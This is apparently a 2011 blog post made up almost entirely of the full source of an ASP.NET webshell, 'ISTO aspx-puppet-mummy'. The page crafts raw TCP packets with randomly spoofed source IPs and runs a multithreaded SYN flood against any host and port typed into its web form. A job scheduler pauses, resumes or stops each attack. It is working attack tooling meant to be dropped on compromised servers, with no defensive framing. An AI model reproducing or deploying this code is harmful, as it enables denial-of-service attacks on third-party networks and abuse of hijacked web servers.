Webshell DDOS [aspx版]

<%@ Page Language="C#" AutoEventWireup="true" ValidateRequest="false"%> <%@ Import Namespace="System" %> <%@ Import Namespace="System.Net" %> <%@ Import Namespace="System.Net.Sockets" %> <%@ Import Namespace="System.Threading" %> <%@ Import Namespace="System.Runtime.InteropServices" %> <SCRIPT runat="server"> static ArrayList jobScheduler = new ArrayList();//JOB Scheduler //控制攻击类 public class DDosAttack { public string targetHost = ""; public ushort targetPort = 0; public int attackThread = 0; Thread[] thread = null; public string errMsg = ""; public int state = 0;//0进行 1暂停 2停止 public void run() { thread = new Thread[attackThread]; syn ddos = new syn(targetHost, targetPort); try { for (int i = 0; i < attackThread; i++) { ddos.father = this; thread[i] = new Thread(new ThreadStart(ddos.synFlood)); thread[i].Start(); } } catch(Exception e) { errMsg = e.Message; } } } public struct ipHeader { public byte ip_verlen; //4位首部长度+4位IP版本号 public byte ip_tos; //8位服务类型TOS public ushort ip_totallength; //16位数据包总长度(字节) public ushort ip_id; //16位标识 public ushort ip_offset; //3位标志位 public byte ip_ttl; //8位生存时间 TTL public byte ip_protocol; //8位协议(TCP, UDP, ICMP, Etc.) 
public ushort ip_checksum; //16位IP首部校验和 public uint ip_srcaddr; //32位源IP地址 public uint ip_destaddr; //32位目的IP地址 } public struct psdHeader { public uint saddr; //源地址 public uint daddr; //目的地址 public byte mbz; public byte ptcl; //协议类型 public ushort tcpl; //TCP长度 } public struct tcpHeader { public ushort th_sport; //16位源端口 public ushort th_dport; //16位目的端口 public int th_seq; //32位序列号 public uint th_ack; //32位确认号 public byte th_lenres; //4位首部长度/6位保留字 public byte th_flag; //6位标志位 public ushort th_win; //16位窗口大小 public ushort th_sum; //16位校验和 public ushort th_urp; //16位紧急数据偏移量 } //这3个是ip首部tcp伪首部tcp首部的定义。 public class syn { private uint ip; private ushort port; private EndPoint ep; private Socket sock; private ipHeader iph; private psdHeader psh; private tcpHeader tch; public DDosAttack father; public Random rand; public UInt16 checksum(UInt16[] buffer, int size) { Int32 cksum = 0; int counter; counter = 0; while (size > 0) { UInt16 val = buffer[counter]; cksum += Convert.ToInt32(buffer[counter]); counter += 1; size -= 1; } cksum = (cksum >> 16) + (cksum & 0xffff); cksum += (cksum >> 16); return (UInt16)(~cksum); } //SYN攻击类 public syn(string _ip, ushort _port) { IPHostEntry ih = Dns.GetHostByName(_ip); ip = Convert.ToUInt32(ih.AddressList[0].Address); IPEndPoint _ep = new IPEndPoint(ih.AddressList[0], _port); port = _port; ep = _ep; ipHeader iph = new ipHeader(); psh = new psdHeader(); tch = new tcpHeader(); sock = new Socket(AddressFamily.InterNetwork, SocketType.Raw, ProtocolType.IP); sock.SetSocketOption(SocketOptionLevel.IP, SocketOptionName.HeaderIncluded, 1); rand = new Random(); } //循环发送数据 public void synFlood() { //iph.ip_verlen = (byte)(4 << 4 | sizeof(ipHeader) / sizeof(uint)); iph.ip_verlen = (byte)(4 << 4 | Marshal.SizeOf(iph) / Marshal.SizeOf(ip)); //ipv4,20字节ip头,这个固定就是69 iph.ip_tos = 0; //这个0就行了 iph.ip_totallength = 0x2800; //这个是ip头+tcp头总长,40是最小长度,不带tcp option,应该是0028但是还是网络字节序所以倒过来成了2800 iph.ip_id = 0x9B18; //这个我是拦截ie发送。直接添上来了 iph.ip_offset = 0x40; 
//这个也是拦截ie的 iph.ip_ttl = 64; //也是拦截ie的,也可以是128什么的。 iph.ip_protocol = 6; //6就是tcp协议 iph.ip_checksum = UInt16.Parse("0"); //没计算之前都写0 iph.ip_destaddr = ip; //ip头的目标地址就是要攻击的地址,上面传过来的。 psh.daddr = iph.ip_destaddr; //伪tcp首部用于校验的,上面是目的地址,和ip的那个一样。 psh.mbz = 0; //这个据说0就行 psh.ptcl = 6; //6是tcp协议 psh.tcpl = 0x1400; //tcp首部的大小,20字节,应该是0014,还是字节序原因成了1400 tch.th_dport = port; //攻击端口号,上面传过来的 tch.th_ack = 0; //第一次发送所以没有服务器返回的序列号,为0 //tch.th_lenres = (byte)((sizeof(tcpHeader) / 4 << 4 | 0)); tch.th_lenres = (byte)((Marshal.SizeOf(iph) / 4 << 4 | 0)); //tcp长度 tch.th_flag = 2; //2就是syn tch.th_win = ushort.Parse("16614"); //拦截ie的 tch.th_sum = UInt16.Parse("0"); //没计算之前都为0 tch.th_urp = UInt16.Parse("0"); //这个连ip都是0,新的攻击方法有改这个值的 while (true) { while (father.state == 1) { Thread.Sleep(5000); } if (father.state == 2) { break; } string srcAddress = rand.Next(1, 255) + "." + rand.Next(1, 255) + "." + rand.Next(1, 255) + "." + rand.Next(1, 255);//随机伪IP iph.ip_srcaddr = Convert.ToUInt32(IPAddress.Parse(srcAddress).Address); psh.saddr = iph.ip_srcaddr; ushort sourcePort = Convert.ToUInt16(rand.Next(1, 65535)); byte[] bt = BitConverter.GetBytes(sourcePort); Array.Reverse(bt); tch.th_sport = BitConverter.ToUInt16(bt, 0); tch.th_seq = IPAddress.HostToNetworkOrder((int)rand.Next(-2147483646, 2147483646)); //上面用随机种子随机产生源ip源端口和tcp序列号并转为网络字节序 iph.ip_checksum = 0; tch.th_sum = 0; //因为循环中,所以每次必须把这2个已有数的清0才可计算 //byte[] psh_buf = new byte[sizeof(psdHeader)]; byte[] psh_buf = new byte[Marshal.SizeOf(psh)]; Int32 index = 0; //index = pshto(psh, psh_buf, sizeof(psdHeader)); index = pshto(psh, psh_buf, Marshal.SizeOf(psh)); if (index == -1) { father.errMsg="构造tcp伪首部错误"; return; } index = 0; //byte[] tch_buf = new byte[sizeof(tcpHeader)]; byte[] tch_buf = new byte[Marshal.SizeOf(tch)]; //index = tchto(tch, tch_buf, sizeof(tcpHeader)); index = tchto(tch, tch_buf, Marshal.SizeOf(tch)); if (index == -1) { father.errMsg="构造tcp首部错误"; return; } index = 0; //byte[] tcphe = new byte[sizeof(psdHeader) + 
sizeof(tcpHeader)]; byte[] tcphe = new byte[Marshal.SizeOf(psh) + Marshal.SizeOf(tch)]; Array.Copy(psh_buf, 0, tcphe, index, psh_buf.Length); index += psh_buf.Length; Array.Copy(tch_buf, 0, tcphe, index, tch_buf.Length); index += tch_buf.Length; tch.th_sum = chec(tcphe, index); index = 0; //index = tchto(tch, tch_buf, sizeof(tcpHeader)); index = tchto(tch, tch_buf, Marshal.SizeOf(tch)); if (index == -1) { father.errMsg="构造tcp首部错误"; return; } index = 0; //byte[] ip_buf = new byte[sizeof(ipHeader)]; byte[] ip_buf = new byte[Marshal.SizeOf(iph)]; //index = ipto(iph, ip_buf,sizeof(ipHeader)); index = ipto(iph, ip_buf, Marshal.SizeOf(iph)); if (index == -1) { father.errMsg="构造ip首部错误"; return; } index = 0; //byte[] iptcp = new byte[sizeof(ipHeader) + sizeof(tcpHeader)]; byte[] iptcp = new byte[Marshal.SizeOf(iph) + Marshal.SizeOf(tch)]; Array.Copy(ip_buf, 0, iptcp, index, ip_buf.Length); index += ip_buf.Length; Array.Copy(tch_buf, 0, iptcp, index, tch_buf.Length); index += tch_buf.Length; iph.ip_checksum = chec(iptcp, index); index = 0; //index = ipto(iph, ip_buf, sizeof(tcpHeader)); index = ipto(iph, ip_buf, Marshal.SizeOf(tch)); if (index == -1) { father.errMsg="构造ip首部错误"; return; } index = 0; Array.Copy(ip_buf, 0, iptcp, index, ip_buf.Length); index += ip_buf.Length; Array.Copy(tch_buf, 0, iptcp, index, tch_buf.Length); index += tch_buf.Length; //if (iptcp.Length != (sizeof(ipHeader) + sizeof(tcpHeader))) if (iptcp.Length != (Marshal.SizeOf(iph) + Marshal.SizeOf(tch))) { father.errMsg="构造iptcp报文错误"; return; } try { //socket.sendto把构造好的数据发送出去 sock.SendTo(iptcp, ep); } catch { father.errMsg="发送错误"; return; } } } public UInt16 chec(byte[] buffer, int size) { Double double_length = Convert.ToDouble(size); Double dtemp = Math.Ceiling(double_length / 2); int cksum_buffer_length = Convert.ToInt32(dtemp); UInt16[] cksum_buffer = new UInt16[cksum_buffer_length]; int icmp_header_buffer_index = 0; for (int i = 0; i < cksum_buffer_length; i++) { cksum_buffer[i] = 
BitConverter.ToUInt16(buffer, icmp_header_buffer_index); icmp_header_buffer_index += 2; } UInt16 u_cksum = checksum(cksum_buffer, cksum_buffer_length); return u_cksum; } //这个是计算校验,把那些类型不一样的全转为16位字节数组用的 public Int32 ipto(ipHeader iph, byte[] Buffer, int size) { Int32 rtn = 0; int index = 0; byte[] b_verlen = new byte[1]; b_verlen[0] = iph.ip_verlen; byte[] b_tos = new byte[1]; b_tos[0] = iph.ip_tos; byte[] b_totallen = BitConverter.GetBytes(iph.ip_totallength); byte[] b_id = BitConverter.GetBytes(iph.ip_id); byte[] b_offset = BitConverter.GetBytes(iph.ip_offset); byte[] b_ttl = new byte[1]; b_ttl[0] = iph.ip_ttl; byte[] b_protol = new byte[1]; b_protol[0] = iph.ip_protocol; byte[] b_checksum = BitConverter.GetBytes(iph.ip_checksum); byte[] b_srcaddr = BitConverter.GetBytes(iph.ip_srcaddr); byte[] b_destaddr = BitConverter.GetBytes(iph.ip_destaddr); Array.Copy(b_verlen, 0, Buffer, index, b_verlen.Length); index += b_verlen.Length; Array.Copy(b_tos, 0, Buffer, index, b_tos.Length); index += b_tos.Length; Array.Copy(b_totallen, 0, Buffer, index, b_totallen.Length); index += b_totallen.Length; Array.Copy(b_id, 0, Buffer, index, b_id.Length); index += b_id.Length; Array.Copy(b_offset, 0, Buffer, index, b_offset.Length); index += b_offset.Length; Array.Copy(b_ttl, 0, Buffer, index, b_ttl.Length); index += b_ttl.Length; Array.Copy(b_protol, 0, Buffer, index, b_protol.Length); index += b_protol.Length; Array.Copy(b_checksum, 0, Buffer, index, b_checksum.Length); index += b_checksum.Length; Array.Copy(b_srcaddr, 0, Buffer, index, b_srcaddr.Length); index += b_srcaddr.Length; Array.Copy(b_destaddr, 0, Buffer, index, b_destaddr.Length); index += b_destaddr.Length; if (index != size/* sizeof(IcmpPacket) */) { rtn = -1; return rtn; } rtn = index; return rtn; } //这个是把ip部分转为字节数组用的 public Int32 pshto(psdHeader psh, byte[] buffer, int size) { Int32 rtn; int index = 0; byte[] b_psh_saddr = BitConverter.GetBytes(psh.saddr); byte[] b_psh_daddr = BitConverter.GetBytes(psh.daddr); byte[] 
b_psh_mbz = new byte[1]; b_psh_mbz[0] = psh.mbz; byte[] b_psh_ptcl = new byte[1]; b_psh_ptcl[0] = psh.ptcl; byte[] b_psh_tcpl = BitConverter.GetBytes(psh.tcpl); Array.Copy(b_psh_saddr, 0, buffer, index, b_psh_saddr.Length); index += b_psh_saddr.Length; Array.Copy(b_psh_daddr, 0, buffer, index, b_psh_daddr.Length); index += b_psh_daddr.Length; Array.Copy(b_psh_mbz, 0, buffer, index, b_psh_mbz.Length); index += b_psh_mbz.Length; Array.Copy(b_psh_ptcl, 0, buffer, index, b_psh_ptcl.Length); index += b_psh_ptcl.Length; Array.Copy(b_psh_tcpl, 0, buffer, index, b_psh_tcpl.Length); index += b_psh_tcpl.Length; if (index != size) { rtn = -1; return rtn; } else { rtn = index; return rtn; } } //这个是把tcp伪首部转为字节数组用的 public Int32 tchto(tcpHeader tch, byte[] buffer, int size) { Int32 rtn; int index = 0; byte[] b_tch_sport = BitConverter.GetBytes(tch.th_sport); byte[] b_tch_dport = BitConverter.GetBytes(tch.th_dport); byte[] b_tch_seq = BitConverter.GetBytes(tch.th_seq); byte[] b_tch_ack = BitConverter.GetBytes(tch.th_ack); byte[] b_tch_lenres = new byte[1]; b_tch_lenres[0] = tch.th_lenres; byte[] b_tch_flag = new byte[1]; b_tch_flag[0] = tch.th_flag; byte[] b_tch_win = BitConverter.GetBytes(tch.th_win); byte[] b_tch_sum = BitConverter.GetBytes(tch.th_sum); byte[] b_tch_urp = BitConverter.GetBytes(tch.th_urp); Array.Copy(b_tch_sport, 0, buffer, index, b_tch_sport.Length); index += b_tch_sport.Length; Array.Copy(b_tch_dport, 0, buffer, index, b_tch_dport.Length); index += b_tch_dport.Length; Array.Copy(b_tch_seq, 0, buffer, index, b_tch_seq.Length); index += b_tch_seq.Length; Array.Copy(b_tch_ack, 0, buffer, index, b_tch_ack.Length); index += b_tch_ack.Length; Array.Copy(b_tch_lenres, 0, buffer, index, b_tch_lenres.Length); index += b_tch_lenres.Length; Array.Copy(b_tch_flag, 0, buffer, index, b_tch_flag.Length); index += b_tch_flag.Length; Array.Copy(b_tch_win, 0, buffer, index, b_tch_win.Length); index += b_tch_win.Length; Array.Copy(b_tch_sum, 0, buffer, index, b_tch_sum.Length); 
index += b_tch_sum.Length; Array.Copy(b_tch_urp, 0, buffer, index, b_tch_urp.Length); index += b_tch_urp.Length; if (index != size) { rtn = -1; return rtn; } else { rtn = index; return rtn; } } //这个是把tcp部分转为字节数组用的,因为这个要用到2次就不把这个和伪首部放一块了。 } </SCRIPT> <% string action = Request.QueryString["Action"]; if (action != null && !"".Equals(action)) { if ("AddToAttack".Equals(action)) { string host = Request.QueryString["host"];//取得主机名字 string port = Request.QueryString["port"];//取得开始port string thread = Request.QueryString["thread"];//取得线程 DDosAttack da = new DDosAttack(); da.targetHost = host; da.targetPort = Convert.ToUInt16(port); da.attackThread = Convert.ToInt32(thread); da.run(); jobScheduler.Add(da); da = null; } else if("del".Equals(action)) { string id = Request.QueryString["id"]; if(id!=null) { int num = Convert.ToInt32(id); DDosAttack da = (DDosAttack)jobScheduler[num]; if (da!=null) { da.state = 2;//停止了线程 jobScheduler.RemoveAt(num); } da = null; } } else if ("Pause".Equals(action)) { string id = Request.QueryString["id"]; if(id!=null) { int num=Convert.ToInt32(id); DDosAttack da = (DDosAttack)jobScheduler[num]; if(da!=null){da.state=1;} da=null; } } else if("Continue".Equals(action)) { string id = Request.QueryString["id"]; if(id!=null) { int num=Convert.ToInt32(id); DDosAttack da = (DDosAttack)jobScheduler[num]; if (da != null) { da.state = 0; } da=null; } } else { //显示作业调度池 Response.Write("<TABLE><TR><TD>JOB</TD><TD>THREAD</TD><TD>STATE</TD><TD>HOST</TD><TD>PORT</TD><TD>ERR MSG</TD><TD>ACTION</TD></TR>"); int count = jobScheduler.Count; for (int i = 0; i < count;i++ ) { jobScheduler.TrimToSize(); DDosAttack da = (DDosAttack)jobScheduler[i]; string dstate = ""; string operate = ""; if(da!=null) { switch (da.state) { case 0: dstate = "running"; operate = "<input type=button value=Pause onclick=\"ThreadOperate('Pause'," + i + ")\">"; break; case 1: dstate = "pause"; operate = "<input type=button value=Continue onclick=\"ThreadOperate('Continue'," + i + ")\">"; 
break; } } Response.Write("<TR><TD>" + i + "</TD><TD>" + da.attackThread + "</TD>"); Response.Write("<TD>" + dstate + "</TD><TD>" + da.targetHost + "</TD><TD>" + da.targetPort + "</TD>"); Response.Write("<TD>" + da.errMsg + "</TD><TD><input type=button value=Drop onclick='DropThread(" + i + ");'>" + operate + "</TD></TR>"); da = null; } Response.Write("</TABLE>"); } GC.Collect(); Response.End(); return; } %> <html xmlns:v="urn:schemas-microsoft-com:vml"> <head><title>ISTO aspx-puppet-mummy</title> <style type="text/css"> v\:*{behavior:url(#default#VML);position:absolute;} body,td{font-size: 12px;} body,td{font-size:12px;} table{T:expression(this.border='1',this.borderColorLight='Black',this.borderColorDark='White');} input,select{font-size:12px;color:#000000;} input{border-color:"#000000";color:#008800;background-color:#333333;} body{margin-left:0px;margin-top:0px;margin-right:0px;margin-bottom:0px;} td{white-space:nowrap;} a{color:black;text-decoration:none; color:#008800;} </style> <script language="javascript"> //common String.prototype.trim = function() { return this.replace(/(^\s*)|(\s*$)/g, ""); } String.prototype.ltrim = function() { return this.replace(/(^\s*)/g, ""); } String.prototype.rtrim = function() { return this.replace(/(\s*$)/g, ""); } function createXmlHttpRequest(){//create AJAX CONSOLES if(window.ActiveXObject){ xmlHttp=new ActiveXObject("Msxml2.XMLHTTP"); }else if(window.XMLHttpRequst){ xmlHttp=new XMLHttpRequst(); } } //ref需要信息的组件 function getTheMessage(ref){ if(xmlHttp.readyState==4){ if(xmlHttp.status==200){ var replaceStr; replaceStr=xmlHttp.responseText; replaceStr=replaceStr.trim(); if(replaceStr!=""&&ref){ ref.innerHTML=replaceStr; } return replaceStr; }else{ return ""; } }else{ return ""; } } //str:connection HTTP URL //code:eval the code function openUrlXmlHttpRequstEval(str,code){ url=str; createXmlHttpRequest(); xmlHttp.open("get",url,true); xmlHttp.onreadystatechange=function tmp(){eval(code);}; xmlHttp.send(); } //str:connection 
HTTP URL //ref:replace the HTML consoles function openUrlXmlHttpRequstReplace(str,ref){ url=str; createXmlHttpRequest(); xmlHttp.open("get",url,true); xmlHttp.onreadystatechange=function tmp(){getTheMessage(ref);}; xmlHttp.send(); } </script> <script language="javascript"> //user define functions //add to scan function post(){ if(S.host.value!=""){ if(parseInt(S.port.value)<=65535){ if(!isNaN(S.port.value)&&parseInt(S.port.value)>0){ var url="?Action=AddToAttack&host="+S.host.value+"&thread="+S.thread.value+"&port="+S.port.value+"&"+Math.random(); openUrlXmlHttpRequstEval(url,"");S.port.value="";S.host.value=""; alert("add success"); }else{ alert("set port error"); } }else{ alert("set port error"); } }else{ alert("HOST can't empty"); } } //view pool function viewSchedulerPool(){ openUrlXmlHttpRequstReplace("?Action="+Math.random(),document.all.pool); } //drop the scanning Thread function DropThread(num){ if(confirm('Are U sure?')){ var url="?Action=del&id="+num+"&"+Math.random(); openUrlXmlHttpRequstEval(url,""); } } function ThreadOperate(ope,id){ if(confirm('Are U sure?')){ var url="?Action="+ope+"&id="+id+"&"+Math.random(); openUrlXmlHttpRequstEval(url,""); } } setInterval("viewSchedulerPool()",3000); </script> </head> <body text="#00ff00" vLink="#008000" aLink="#008000" link="#008000" bgColor="#000000" style="background: no-repeat center center;"> <center> Scheduler Pool: <div id="pool"></div> <hr /> <form method="POST" name='S'> HOST:<input type="text" name="host" /> D-PORT:<input type="text" name="port" size="4" maxlength="5" /> THREAD:<select name="thread"><option value="1">1</option><option value="3">3</option><option value="5">5</option><option value="10">10</option><option value="20">20</option><option value="30">30</option><option value="50">50</option></select> <input type="button" value="Add To Attack" name="Action" onClick="post();" /> </form> </center> <v:Textbox id="istoFullname" style='FONT-SIZE:30;Z-INDEX:3201;FILTER:alpha(opacity=100,style=2) 
blur(add=0,direction=14,strength=5) wave(add=1,freq=,lightstrength=5,phase=5,strength=2) glow(color=#d9f281,strength=3) ;LEFT:10%;COLOR:#f17a35;FONT-FAMILY:@黑体;TOP:35%' inset='5pt,5pt,5pt,5pt'></v:Textbox> </body> </html></body></html>
posted @ 2011-08-04 09:59  Mr.Jim